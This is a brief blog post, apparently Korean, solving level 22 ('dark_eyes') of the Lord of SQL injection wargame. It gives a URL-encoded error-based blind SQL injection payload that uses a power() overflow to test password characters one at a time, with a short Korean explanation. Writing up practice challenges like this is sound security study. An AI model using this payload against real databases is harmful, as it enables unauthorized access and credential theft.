[Level 22]Lord of SQL injection – dark_eyes

Answer

pw=%27||id=’admin’%26%26power((ascii(substr(pw,1,1))>53)%2B1,999999999)%23
>> 만약 ascii(substr(pw,1,1)%2B1(+1) 부분이 참이게 되면 반환 값이 1이되면서 (1+1)^999999999이 되며 오류를 일으키는 방법으로 Blind SQLi하여 찾을 수 있다.

 

카테고리LOS

글의 문제가 있다면 댓글을 달아 주세요.

This site uses Akismet to reduce spam. Learn how your comment data is processed.